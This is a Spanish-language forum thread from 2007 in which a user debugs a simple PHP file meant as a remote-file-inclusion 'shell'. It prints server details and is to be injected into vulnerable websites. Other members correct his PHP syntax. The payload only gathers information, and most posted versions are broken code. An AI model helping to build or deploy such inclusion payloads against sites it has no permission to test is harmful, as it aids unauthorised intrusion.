Autor
|
Tema: Problema programacion de shell RFI (Leído 4,283 veces)
|
skapunky
Electronik Engineer &
Colaborador
Desconectado
Mensajes: 3.667
www.killtrojan.net
|
Buenas, he empezao con estos temas del RFI hace relativamente poco, esta mañana me animado a crear una sencillisima shell en php, pero al usar-la con paginas vulnerables no me carga la información que pido que me muestre. Quiza es un error que he hecho al usar el php o el html y hay algo que se me escapa. Agradeceria si alguien me puede guiar o decir el error. La shell la e alojado por si alguien quiere probar y ver que no devuelve valores: http://xukynet.freehostia.com/x69.txtEl codigo de la shell es el siguiente: <?php
//***************************************************************************************** //* PHP shell writted by skapunky , 2007 :: Exploit RFI :: * //***************************************************************************************** //* __$$$$$$____________________________$$$$$________ * //* __$$$$$$$$*_____________________,,$$$$$$$$*___ * //* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ * //* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ * //* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ * //* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ * //* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ * //* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ * //* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ * //* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ * //* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ * //* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ * //* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ * //* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ * //* * //* License Freeware, x69.txt * //*****************************************************************************************
<html> <body>
<?php
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br> <b>Server Name:</b> <? echo $SERVER_NAME ?> <br> <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br> <b>Server Port:</b> <? echo $SERVER_PORT ?> <br> <b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br> <b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br> <b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br> <b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>
?>
</body> </html> ?> Gracias de antemano, quiza es un problema que falta algun ECHO... haber si alguien me puede ayudar. Saludos.
|
|
|
En línea
|
Killtrojan Syslog v1.44: ENTRAR
|
|
|
yeikos
Desconectado
Mensajes: 1.424
|
Dentro de las etiquetas <?php y ?> solo puede haber código en PHP, si quieres escribir en HTML deberás hacerlo mediante echo... <?php
//***************************************************************************************** //* PHP shell writted by skapunky , 2007 :: Exploit RFI :: * //***************************************************************************************** //* __$$$$$$____________________________$$$$$________ * //* __$$$$$$$$*_____________________,,$$$$$$$$*___ * //* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ * //* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ * //* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ * //* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ * //* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ * //* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ * //* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ * //* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ * //* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ * //* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ * //* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ * //* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ * //* * //* License Freeware, x69.txt * //***************************************************************************************** ?> <html> <body>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br> <b>Server Name:</b> <? echo $SERVER_NAME ?> <br> <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br> <b>Server Port:</b> <? echo $SERVER_PORT ?> <br> <b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br> <b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br> <b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br> <b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>
</body> </html>
|
|
|
En línea
|
|
|
|
skapunky
Electronik Engineer &
Colaborador
Desconectado
Mensajes: 3.667
www.killtrojan.net
|
Esacto, esque en una de mis pruebas en el codigo html le e puesto echo y tampoco me ha funcionado. Aqui dejo el codigo como lo tengo puesto ahora: <?php
//***************************************************************************************** //* PHP shell writted by skapunky , 2007 :: Exploit RFI :: * //***************************************************************************************** //* __$$$$$$____________________________$$$$$________ * //* __$$$$$$$$*_____________________,,$$$$$$$$*___ * //* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ * //* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ * //* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ * //* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ * //* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ * //* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ * //* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ * //* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ * //* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ * //* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ * //* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ * //* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ * //* * //* License Freeware, x69.txt * //*****************************************************************************************
echo <html> echo <body> echo Información : echo <br> <?php
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br> <b>Server Name:</b> <? echo $SERVER_NAME ?> <br> <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br> <b>Server Port:</b> <? echo $SERVER_PORT ?> <br> <b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br> <b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br> <b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br> <b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>
?>
echo </body> echo </html> ?> Gracias por la ayuda. Ahora con esto asi se me ve igual...no se ven los valores de los parametros que pido en el codigo Mira, ahora al utilizarlo en una pagina vulnerable, e probao otros como el r57 y va perfectamente, al udsar el mio este x69, me sale lo siguiente dentro la pagina vulnerable: No entiendo ese error....
|
|
« Última modificación: 10 Julio 2007, 18:11 pm por skapunky »
|
En línea
|
Killtrojan Syslog v1.44: ENTRAR
|
|
|
yeikos
Desconectado
Mensajes: 1.424
|
Deberías de leerte algún manual de PHP, no tienes mucha soltura con éste... <?php echo "<b>Server Software: </b>".$SERVER_SOFTWARE. "<br><b>Server Name: </b>".$SERVER_NAME. "<br><b>Server Protocol: </b>".$SERVER_PROTOCOL. "<br><b>Server Port: </b>".$SERVER_PORT. "<br><b>CGI usada por el servidor: </b>".$GATEWAY_INTERFACE. "<br><b>Directorio Root: </b>".$DOCUMENT_ROOT. "<br><b>Tipo de conexión: </b>".$HTTP_CONNECTION. "<br><b>Dirección IP Remitente: </b>".$REMOTE_ADDR; ?>
|
|
|
En línea
|
|
|
|
Ertai
|
Las variables de entorno se guardan en un array llamado $_SERVER.
Llama a cada uno usando... $_SERVER['SERVER_PORT'], etc, etc...
Saludos y leete algun manual de PHP.
|
|
|
En línea
|
Si la felicidad se comprara, entonces el dinero sería noble. void rotar_by_ref(int& a, int& b) { /* Quien dijo que no se podia sin una variable temporal? */ *a = *a ^ *b; *b = *a ^ *b; *a = *a ^ *b; }
|
|
|
skapunky
Electronik Engineer &
Colaborador
Desconectado
Mensajes: 3.667
www.killtrojan.net
|
Ya he mirado, que se be que hay una nueva forma de declarar las variables...esque hice php hace algunos años y tampoco muy extenso... Siento por preguntar tanto, pero bueno, por algo se empieza. De momento tengo esto y la pagina vulnerable no me muestra nada: <?php
//***************************************************************************************** //* PHP shell writted by skapunky , 2007 :: Exploit RFI :: * //***************************************************************************************** //* __$$$$$$____________________________$$$$$________ * //* __$$$$$$$$*_____________________,,$$$$$$$$*___ * //* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ * //* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ * //* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ * //* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ * //* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ * //* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ * //* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ * //* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ * //* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ * //* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ * //* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ * //* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ * //* * //* License Freeware, x69.txt * //*****************************************************************************************
echo <html> echo <body> echo Información : echo <br>
<?php echo "<b>Server Software: </b>" $_server['SERVER_SOFTWARE']; "<br><b>Server Name: </b>" $_server['SERVER_NAME']; "<br><b>Server Protocol: </b>" $_server['SERVER_PROTOCOL']; "<br><b>Server Port: </b>" $_SERVER['SERVER_PORT']; "<br><b>CGI usada por el servidor: </b>" $_server['GATEWAY_INTERFACE']; "<br><b>Directorio Root: </b>" $_server['DOCUMENT_ROOT']; "<br><b>Tipo de conexión: </b>" $_server['HTTP_CONNECTION']; "<br><b>Dirección IP Remitente: </b>" $_server['REMOTE_ADDR']; ?>
echo </body> echo </html> ?> Alguien sabe almenos como puedo testear si funciona?. Gracias por adelantado.
|
|
« Última modificación: 10 Julio 2007, 23:57 pm por skapunky »
|
En línea
|
Killtrojan Syslog v1.44: ENTRAR
|
|
|
yeikos
Desconectado
Mensajes: 1.424
|
PHP es case sensitive es decir, no es lo mismo $a que $A, partiendo de eso, $_server['SERVER_NAME'] no es lo mismo que $_SERVER['SERVER_NAME'], ya que SERVER debe de estar escrito en mayúsculas.
También he de decir a Ertai que es lo mismo $_SERVER['SERVER_NAME'] que $SERVER_NAME...
skapunky, el último código que escribí funciona correctamente, no se porque no lo utilizas.
¿Como saber si el código funciona correctamente? Sube el código a cualquier servidor con soporte PHP y si te carga todo correctamente también lo hará cuando hagas el include().
|
|
|
En línea
|
|
|
|
skapunky
Electronik Engineer &
Colaborador
Desconectado
Mensajes: 3.667
www.killtrojan.net
|
Bueno, despues de muxo provar e creado un host con php y me sale un error de sitaxis..el error es el siguiente: Parse error: syntax error, unexpected T_VARIABLE in /data/members/free/tripod/es.... El codigo empleado es: <?php
/* ***************************************************************************************** * PHP shell writted by skapunky , 2007 :: Exploit RFI :: * ***************************************************************************************** * __$$$$$$____________________________$$$$$________ * * __$$$$$$$$*_____________________,,$$$$$$$$*___ * * ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ * * ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ * * ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ * * ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ * * ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ * * ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ * * __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ * * _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ * * ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ * * ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ * * ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ * * ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ * * ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ * * ____,,$$$$'_.*_______$$$$$$$$$__*____** _ * * * * License Freeware, x69.txt * ***************************************************************************************** */
"<b>Server Software: </b>" $_SERVER['SERVER_SOFTWARE']; "<b>Server Name: </b>" $_SERVER['SERVER_NAME']; "<b>Server Protocol: </b>" $_SERVER['SERVER_PROTOCOL']; "<b>Server Port: </b>" $_SERVER['SERVER_PORT']; "<b>CGI usada por el servidor: </b>" $_SERVER['GATEWAY_INTERFACE']; "<b>Directorio Root: </b>" $_SERVER['DOCUMENT_ROOT']; "<b>Tipo de conexión: </b>" $_SERVER['HTTP_CONNECTION']; "<b>Dirección IP Remitente: </b>" $_SERVER['REMOTE_ADDR'];
?> La linia 31 tiene puesto el punto y coma...no se cual debe ser el error,aps e quitado todo el codigo html para que sea mas sencillo esto y evitar posibles errores. Saludos. PD: si le pogo el comando echo antes de la linia del server software me sale el sigueinte error: Parse error: syntax error, unexpected T_VARIABLE, expecting ',' or ';' in /data/members/free/tripod........ Gracias.
|
|
|
En línea
|
Killtrojan Syslog v1.44: ENTRAR
|
|
|
yeikos
Desconectado
Mensajes: 1.424
|
No tienes ni idea de PHP y este no es el lugar para hablar de esto.
Si de verás te interesa el tema leete por lo menos un manual porque no sabes hacer ni lo elemental, será mejor que cierren el tema, suerte.
|
|
|
En línea
|
|
|
|
skapunky
Electronik Engineer &
Colaborador
Desconectado
Mensajes: 3.667
www.killtrojan.net
|
TEMA RESUELTO
Lo que fallava eran las etiquetas de negrita y <br>.... En cuanto lo otro va perfectamente.
|
|
|
En línea
|
Killtrojan Syslog v1.44: ENTRAR
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Problema de programacion
Programación C/C++
|
jberlin
|
1
|
2,331
|
27 Enero 2011, 01:39 am
por Destro-
|
|
|
problema programacion
Programación C/C++
|
furia89
|
0
|
1,578
|
27 Junio 2011, 00:53 am
por furia89
|
|
|
Problema con shell. BUG : TimThumb
Hacking
|
buscador-tecnologico
|
3
|
3,966
|
20 Diciembre 2011, 14:59 pm
por toxeek
|
|
|
Programacion shell y awk
GNU/Linux
|
idelkys
|
0
|
1,425
|
13 Julio 2012, 00:49 am
por idelkys
|
|
|
Programación en shell
« 1 2 »
Scripting
|
Lariscal23
|
12
|
10,109
|
3 Febrero 2022, 17:43 pm
por .xAk.
|
|